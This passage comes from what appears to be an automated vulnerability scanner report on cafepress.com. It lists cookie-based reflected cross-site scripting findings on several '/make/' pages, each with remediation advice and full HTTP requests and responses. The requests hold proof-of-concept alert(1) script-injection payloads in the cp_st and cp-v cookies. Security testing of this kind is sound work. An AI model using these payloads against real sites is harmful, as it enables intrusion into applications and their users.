Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=bca4a</script><script>alert(1)</script>d8d616836de ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58850 Date: Sun, 26 Dec 2010 13:48:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'bca4a</script><script>alert(1)</script>d8d616836de ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/holiday-invitations
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9671b"-alert(1)-"c603f1ee3b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 55553 Date: Sun, 26 Dec 2010 13:47:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55553 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/holiday-invitations
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c12</script><script>alert(1)</script>767fea4e030 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=22c12</script><script>alert(1)</script>767fea4e030 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 55575 Date: Sun, 26 Dec 2010 13:47:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55575 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '22c12</script><script>alert(1)</script>767fea4e030 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-photo-cards
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744de"-alert(1)-"d438f72d6bc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 58754 Date: Sun, 26 Dec 2010 13:47:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-photo-cards
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf95</script><script>alert(1)</script>565909414f4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=acf95</script><script>alert(1)</script>565909414f4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 58776 Date: Sun, 26 Dec 2010 13:47:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58776 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'acf95</script><script>alert(1)</script>565909414f4 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-gifts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c29af"-alert(1)-"a5c8b14505 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
